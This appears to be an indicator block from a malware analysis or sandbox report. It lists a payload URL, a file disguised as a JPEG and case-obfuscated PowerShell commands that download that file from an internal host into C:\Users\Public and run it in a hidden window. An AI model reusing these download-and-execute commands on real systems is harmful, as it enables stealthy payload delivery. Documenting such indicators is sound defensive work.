Technical Information
- http://10.#.2.15/payload.bat
- http://10.#.2.15/teste.jpg as c:\users\public\teste.jpg
- '<LOCALNET>.2.15':80
- '%WINDIR%\syswow64\cmd.exe' /c PoWeRsHeLl -wIn 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('http://10.#.2.15/teste.jpg', 'C:\Users\Public\teste.jpg') & pOwErShElL -wIn 1 -c C:\Users\Public\teste.jpg & pOwErShElL -wIn 1 -...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -wIn 1 -c C:\Users\Public\teste.jpg